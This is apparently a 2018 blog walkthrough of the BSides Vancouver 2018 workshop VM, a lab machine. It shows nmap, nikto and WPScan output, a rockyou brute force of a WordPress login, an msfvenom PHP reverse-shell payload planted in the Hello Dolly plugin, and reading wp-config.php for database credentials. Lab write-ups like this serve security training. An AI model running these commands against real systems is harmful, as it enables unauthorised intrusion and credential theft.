Tuesday, July 10, 2018

BSides Vancouver: 2018 (Workshop) Workthrough (part -1)

you can find the VM and more information from here.

open the ova file with vmware.

nmap results

nmap -Pn  -sV -sS -sC

Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-10 10:32 +0530
Nmap scan report for
Host is up (0.00057s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_drwxr-xr-x    2 65534    65534        4096 Mar 03 17:52 public
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
|   2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_  256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry

|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:41:F5:CC (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP login

Nikto result

nikto -host
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2018-07-10 09:54:27 (GMT5.5)
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 2140, size: 177, mtime: Sun Mar  4 00:47:59 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
+ Uncommon header 'link' found, with contents: </backup_wordpress/?rest_route=/>; rel="https://api.w.org/"
+ Entry '/backup_wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8347 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2018-07-10 09:54:40 (GMT5.5) (13 seconds)
+ 1 host(s) tested

WP Scann - 1 user enumeration

 wpscan --url --enumerate u
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
<--sniff -->

+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    | Id | Login | Name |
    | 1  | admin | admi |
    | 2  | john  | joh  |
[!] Default first WordPress username 'admin' is still used

[+] Finished: Tue Jul 10 10:10:11 2018
[+] Requests Done: 57
[+] Memory used: 64.051 MB
[+] Elapsed time: 00:00:05

wpscan user bruteforce

 wpscan --url --wordlist /home/sura/Research-and-Development/password-dump/rockyou.txt --username john
        __          _______   _____                 
        \ \        / /  __ \ / ____|                
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_

[+] URL:
[+] Started: Tue Jul 10 09:23:42 2018

<-- sniff -->

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  [!] ERROR: We received an unknown response for login: john and password: enigma            
^CBrute Forcing 'john' Time: 00:27:35 <              > (11312 / 2902428)  0.38%  ETA: ??:??:??

login to web site with username password found

Genarate Payload with msfvnom 

msfvenom -p php/reverse_php lhost= lport=4445 -f raw -e php/base64
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4021 (iteration=0)
php/base64 chosen with final size 4021
Payload size: 4021 bytes

paste payload into hello dolly plugin hello.php and update it. and active it

php reverse shell

database credentials found

cat /var/www/backup_wordpress/wp-config.php